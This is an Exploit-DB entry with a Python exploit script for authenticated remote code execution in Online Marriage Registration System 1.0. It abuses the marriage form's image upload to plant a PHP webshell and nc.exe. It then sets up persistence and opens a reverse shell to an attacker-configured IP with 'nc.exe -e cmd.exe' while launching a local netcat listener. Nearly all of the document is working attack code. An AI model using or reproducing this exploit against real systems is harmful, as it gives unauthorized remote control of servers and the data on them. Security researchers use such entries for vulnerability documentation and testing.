Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (2)

EDB-ID:

49260

CVE:

N/A




Platform:

PHP

Date:

2020-12-15


# Exploit Title: Online Marriage Registration System (OMRS) 1.0 - Remote Code Execution (Authenticated)
# Google Dork: N/A
# Date: 2020-14-12
# Exploit Author: Andrea Bruschi - www.andreabruschi.net
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/online-marriage-registration-system-using-php-and-mysql/
# Version: 1.0
# Tested on: Windows 10 / Xampp Server and Wamp Server

#!/usr/bin/python3

import requests
import sys
import os
import iterm2
import AppKit

url = sys.argv[1]
mobile = sys.argv[2]
password = sys.argv[3] 

# CONFIGURE HERE
reverse_ip = '192.168.xx.xx'
reverse_port = 4444

# CONFIGURE HERE
# SCRIPT WILL DOWNLOAD NETCAT AND A WEBSHELL
netcat_path = '/local/path/to/nc.exe'
shell_path = '/local/path/to/shell.php'


def login(url, mobile, password):

    url = "{}/user/login.php".format(url)
    payload = {'mobno':mobile, 'password':password, 'login':''}
    req = requests.post(url, data=payload)
    cookie = req.cookies['PHPSESSID']
    
    return cookie


def upload(url, cookie, file=None):

    f = open(file, 'rb')
    filename, ext = os.path.splitext(file)

    if "exe" in ext:
        content_type = 'application/octet-stream'
    else:
        content_type = 'application/x-php'

    cookie = {'PHPSESSID':cookie}
    url = "{}/user/marriage-reg-form.php".format(url)

    files = {'husimage': (filename + ext, f, content_type, {'Expires': '0'}), 'wifeimage':('test.jpg','','image/jpeg')}
    payload = {'dom':'05/01/2020','nofhusband':'test', 'hreligion':'test', 'hdob':'05/01/2020','hsbmarriage':'Bachelor','haddress':'test','hzipcode':'test','hstate':'test','hadharno':'test','nofwife':'test','wreligion':'test','wsbmarriage':'Bachelor','waddress':'test','wzipcode':'test','wstate':'test','wadharno':'test','witnessnamef':'test','waddressfirst':'test','witnessnames':'test','waddresssec':'test','witnessnamet':'test','waddressthird':'test','submit':''}
    req = requests.post(url, data=payload, cookies=cookie, files=files)
    print(f'[+] File {ext} uploaded')


def get_remote_file(url, ext):

    url = "{}/user/images".format(url)
    req = requests.get(url)
    junk = req.text.split(ext)[0]
    f = junk[-42:] + ext
    
    return f


def persistence(url, webshell, netcat):

    # webshell
    payload_w = "copy /y {} shell.php".format(webshell)
    url_w = "{}/user/images/{}?cmd={}".format(url, webshell, payload_w)
    req_w = requests.get(url_w)
    
    # netcat
    payload_n = "copy /y {} nc.exe".format(netcat)
    url_n = "{}/user/images/{}?cmd={}".format(url, webshell, payload_n)
    req_n= requests.get(url_n)

    print('[+] Persistence enabled')


def get_reverse(url, ip, port):

    payload = "nc.exe -nv {} {} -e cmd.exe".format(ip, port)
    url_r = "{}/user/images/shell.php?cmd={}".format(url, payload)
    print('[+] Reverse shell incoming!')
    req = requests.get(url_r)


# CONFIGURE HERE
# THE SCRIPT WILL LAUNCH iTerm2 WINDOW RUNNING NC LISTENER
# YOU CAN ALSO COMMENT THE CALL TO THIS FUNCTION BELOW AND START NC MANUALLY
def start_listener(port):
    
    # Launch the app
    AppKit.NSWorkspace.sharedWorkspace().launchApplication_("iTerm2")

    async def main(connection):
        app = await iterm2.async_get_app(connection)
        window = app.current_window
        if window is not None:
            cmd = "nc -lnv {}".format(port)
            await window.async_create_tab(command=cmd)
        else:
            print("No current window")

    iterm2.run_until_complete(main)



if __name__ == "__main__":

    if len(sys.argv < 3): 
        print("Usage: exploit.py <URI> <MOBILE> <PASSWORD>")
    else:
        cookie = login(url, mobile, password)
        upload(url, cookie, netcat_path)
        upload(url, cookie, shell_path)
        webshell = get_remote_file(url, '.php')
        netcat = get_remote_file(url, '.exe')
        persistence(url, webshell, netcat)
        
        start_listener(reverse_port)
        get_reverse(url, reverse_ip, reverse_port)